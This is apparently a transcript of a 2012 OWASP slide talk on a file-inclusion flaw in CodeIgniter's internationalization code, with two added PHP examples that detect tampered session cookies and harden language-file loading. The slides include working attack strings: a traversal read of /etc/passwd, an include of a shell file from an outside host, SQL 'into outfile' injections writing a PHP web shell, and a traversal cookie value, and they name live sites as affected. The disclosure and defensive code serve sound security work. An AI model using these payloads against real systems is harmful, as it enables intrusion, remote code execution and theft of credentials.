CodeIgniter i18n Security Flaw
This demonstrates an LFI (local file inclusion) security flaw in the internationalization feature of CodeIgniter, the famous PHP framework.
This was coined by me, and used to exploit numerous CodeIgniter-powered websites. Currently reported and fixed.

Published in: Technology
  • For creating an international or multilingual website in CodeIgniter, it is better to use the language classes. The language library of CodeIgniter doesn't have any security flaw like that. The process of using these classes in your code is really simple as well, example: https://www.cloudways.com/blog/multi-language-codeigniter/

Slide 1: CodeIgniter i18n Code Injection (20 May 2012)
Abbas Naderi (aka AbiusX), OWASP Chapter Leader of Iran, ISSECO Member
abbas.naderi@owasp.org / me@abiusx.com

Slide 2: Understand the Context

Slide 3: PHP
• Mostly used SSI (75%)
• 17 Years Maturity
• Open Source Nature
• Rapid Develop/Deploy
• Secure Core
• Insecure Libraries
• Low Level Web Development *

Slide 4: PHP Frameworks
• PHP low level web support
• Incorporation of Frameworks
• Much Used and Mature -> Secure
• Huge Codebase -> Insecure
• Developers, not Security guys
• Security-Oriented Frameworks (OWASP ESAPI)

Slide 5: CodeIgniter
• Most used Mid-level Framework

Slide 6: Internationalization
• i18n importance today
• Difficult implementation:
  – File-based (Wordpress, eFront, …)
  – Database (jFramework)
  – Code-based (CodeIgniter, …)
• Obsolete consumers -> No testing

Slide 7: Remote File Inclusion

Slide 8: RFI at a glance
• 3rd Most Common Vuln. in Top Ten 2007: Malicious File Inclusion
• Not in Top Ten 2010: Mostly Understood and Fixed
• Highest Impact (Run Arbitrary Code!)
• Common in Interpreted Languages
• Most Common in PHP (Why?)

Slide 9: RFI Example
    <?php
    $page = $_GET['page'];
    include "./pages/{$page}.php";
Malicious input: Mysite.com?page=../../../etc/passwd%00
Where the current dir is /var/www:
    include "/var/www/pages/../../../etc/passwd";
    = include "/etc/passwd"; // show it on screen

Slide 10: RFI Cheatsheet
Use a null character in the input to terminate the string:
    include "./{$page}.you.cant.rfi.me.php";
Use absolute paths if the input starts the include path:
    include "{$_GET['page']}";
    page=http://abx.ir/shell.txt%00
Slide 11: allow_url_include

Slide 12: Filter Parameters
• CodeIgniter has the least found exploits of all major PHP frameworks (Commercial Codebase)
• CodeIgniter filters dangerous characters such as ', ", /, ?, <, > on GET parameters, to prevent most XSS and Injection attacks.
• CodeIgniter has a central module loader, and the MVC pattern, preventing most RFIs.

Slide 13: Internationalization

Slide 14: Internationalization (II)

Slide 15: Local File Inclusion
• Useful to extract info. from the target system
  – /etc/passwd
  – ./config/database.php
• Easy to exploit

Slide 16: Local Code Inclusion
• Requires a blind injection:
  – ' and 1=0 union select "<?php echo shell_exec($_REQUEST[q]); into outfile "/tmp/sales_lang.php" --
  – CodeIgniter filters <? from input
  – ' and 1=0 union select unhex("3c3f706870206563686f207368656c6c5f6578656328245f524551554553545b715d29") into outfile "/tmp/common_lang.php" --
  – Caution: into outfile does not overwrite!
  – Where to find a blind injection?

Slide 17: Local Code Inclusion (II)
• Now change the cookie from
  – a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aa55f87c8b18afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A%22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A%22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A%22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965bad
  to
  – lang%22%3Bs%3A2%3A%22../../../../../tmp
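The cookie edit on slide 17 works because the `lang` value is read back from the serialized session and spliced into an include path. The PHP below is an added example, not from the slides and not CodeIgniter's own code: it parses a cookie laid out the way CodeIgniter 2.x builds it with cookie encryption off (serialized array followed by a 32-character md5; that layout is an assumption here), extracts `lang` without letting unserialize() create objects, and flags any value that is not a plain language identifier. The function names and the four sample cookies are constructed for the example.

```php
<?php
// Added example (not from the slides and not CodeIgniter code): inspect a
// CodeIgniter 2.x style session cookie and flag a tampered "lang" value
// before anything like it reaches include().

declare(strict_types=1);

/**
 * Split a cookie assumed to be laid out as serialize($data) . md5(...) and
 * return the data array, or null when the layout does not match.
 */
function parse_ci_session_cookie(string $rawCookie): ?array
{
    $decoded = urldecode($rawCookie);
    // Assumed layout: serialized array followed by a 32-hex-char md5 (cookie encryption off).
    if (!preg_match('/^(a:\d+:\{.*\})([0-9a-f]{32})$/s', $decoded, $m)) {
        return null;
    }
    // Never let unserialize() instantiate objects from attacker-controlled input.
    $data = @unserialize($m[1], ['allowed_classes' => false]);
    return is_array($data) ? $data : null;
}

/** A language key is acceptable only as a short identifier with no path characters. */
function is_valid_lang_key(string $lang): bool
{
    return (bool) preg_match('/^[a-z]{2,8}(?:[_-][a-z]{2,8})?$/', $lang);
}

/** One-line verdict per cookie, suitable for log review or a WAF/IDS rule. */
function audit_cookie(string $rawCookie): string
{
    $data = parse_ci_session_cookie($rawCookie);
    if ($data === null) {
        return 'MALFORMED: cookie does not match the serialize()+md5 layout';
    }
    $lang = $data['lang'] ?? '';
    if (!is_string($lang)) {
        return 'SUSPICIOUS: lang is not a string';
    }
    if ($lang === '') {
        return 'OK: no lang key';
    }
    if (strpos($lang, "\0") !== false || !is_valid_lang_key($lang)) {
        // Escape control bytes so a null byte or newline cannot hide in the log line.
        return 'SUSPICIOUS: lang=' . addcslashes($lang, "\0..\37\177");
    }
    return 'OK: lang=' . $lang;
}

// Constructed sample cookies (not real session data). The hash is a dummy
// 32-char value; a real deployment verifies it against its key first.
$dummyHash = str_repeat('0', 32);
$samples = [
    'benign'   => urlencode(serialize(['session_id' => str_repeat('a', 32), 'lang' => 'fa'])) . $dummyHash,
    'tampered' => urlencode(serialize(['session_id' => str_repeat('a', 32), 'lang' => '../../../../../tmp'])) . $dummyHash,
    'nullbyte' => urlencode(serialize(['session_id' => str_repeat('a', 32), 'lang' => "fa\0"])) . $dummyHash,
    'garbage'  => 'not-a-session-cookie',
];

foreach ($samples as $name => $cookie) {
    echo str_pad($name, 9), '-> ', audit_cookie($cookie), PHP_EOL;
}
```

Run it with `php audit_cookie.php`: the `benign` cookie is reported OK, the `tampered` and `nullbyte` ones are reported SUSPICIOUS, and the `garbage` one MALFORMED. The same `is_valid_lang_key` check belongs in the application itself, before the value is ever used to build a path; the audit function is only the detection side of that rule.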
Slide 18: Remote Code Inclusion
• Look at the code:
    include($package_path.'language/'.$idiom.'/'.$langfile);
• You're a hacker? Tell me how!

Slide 19: Remote Code Inclusion (II)
$this->load->add_package_path()
"Adding a package path instructs the Loader class to prepend a given path for subsequent requests for resources. As an example, the "Foo Bar" application package above has a library named Foo_bar.php. In our controller, we'd do the following:"
    $this->load->add_package_path(APPPATH.'third_party/foo_bar/');
http://codeigniter.com/user_guide/libraries/loader.html
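Slide 9's `include "./pages/{$page}.php"` and slide 18's `include($package_path.'language/'.$idiom.'/'.$langfile)` share one defect: strings controlled by the request or the session reach include() unchecked. The PHP below is an added example, not CodeIgniter's code, showing that vulnerable shape next to a hardened loader (the name `safe_language_include` is hypothetical) that allow-lists the idiom and file names and then confirms with realpath() that the resolved file still lies under the package's language directory. The fixture directory it builds in the system temp dir and the five test requests are constructed for the demo.

```php
<?php
// Added example (not CodeIgniter's code): the include shape from slides 9 and
// 18 next to a hardened loader that confines the file to the package's
// language directory. The fixture below is created in the system temp dir.

declare(strict_types=1);

/** The vulnerable shape from the slides, kept for contrast and never called here. */
function vulnerable_language_include(string $packagePath, string $idiom, string $langfile): void
{
    // $idiom such as "../../../../../tmp" leaves the language directory entirely.
    include($packagePath . 'language/' . $idiom . '/' . $langfile);
}

/**
 * Hardened variant (hypothetical name): allow-list both identifiers, then
 * check with realpath() that the resolved file still lies under the
 * package's language directory. Returns the $lang array the file defined,
 * or null when the request was rejected.
 */
function safe_language_include(array $packagePaths, string $idiom, string $langfile): ?array
{
    // An idiom is a short identifier; a language file is <name>_lang.php.
    // Neither pattern admits "/", "\", ".." or a null byte.
    if (!preg_match('/^[a-z]{2,20}(?:[_-][a-z]{2,8})?$/', $idiom)) {
        return null;
    }
    if (!preg_match('/^[a-z0-9_]{1,40}_lang\.php$/', $langfile)) {
        return null;
    }
    foreach ($packagePaths as $packagePath) {
        $base = realpath($packagePath . '/language');
        if ($base === false) {
            continue;
        }
        $candidate = realpath($base . '/' . $idiom . '/' . $langfile);
        // Defence in depth: even a symlinked idiom directory may not resolve outside $base.
        if ($candidate === false || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($candidate)) {
            continue;
        }
        $lang = [];
        include($candidate);   // the language file populates the local $lang array
        return $lang;
    }
    return null;
}

// --- Constructed fixture: one package with a single English language file. ---
$package = sys_get_temp_dir() . '/ci_lang_demo_' . getmypid();
mkdir($package . '/language/english', 0700, true);
file_put_contents($package . '/language/english/common_lang.php', "<?php \$lang['greeting'] = 'Hello';\n");

$attempts = [
    ['english',            'common_lang.php'],    // legitimate request
    ['../../../../../tmp', 'common_lang.php'],    // traversal in the idiom slot (slide 17)
    ["english\0",          'common_lang.php'],    // null byte, rejected before any filesystem call
    ['english',            '../../outside.php'],  // traversal in the file slot
    ['german',             'common_lang.php'],    // well-formed, but no such file
];
foreach ($attempts as [$idiom, $file]) {
    $result = safe_language_include([$package], $idiom, $file);
    printf("%-22s %-18s => %s\n",
        addcslashes($idiom, "\0..\37"), $file,
        $result === null ? 'rejected' : 'loaded greeting=' . $result['greeting']);
}

// Remove the fixture.
unlink($package . '/language/english/common_lang.php');
rmdir($package . '/language/english');
rmdir($package . '/language');
rmdir($package);
```

Only the first request loads the file; the other four are rejected. The regexes do the real work and the realpath() comparison is a second, independent check, so a mistake in one pattern (or a symlink dropped into the language directory) does not by itself reopen the traversal.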
Slide 20: Demonstration

Slide 21: CodeIgniter + i18n
• More than 240 sites discovered:
  – http://www.sedoparking.com
  – http://bambooinvoice.org/
  – http://www.haughin.com/
  – http://www.rapyd.com/
  – http://code-igniter.ru/
• And tons more…

Slide 22: Questions? Feedback?
Abbas Naderi (aka AbiusX), OWASP Chapter Leader of Iran, ISSECO Member
abiusx@acm.org / me@abiusx.com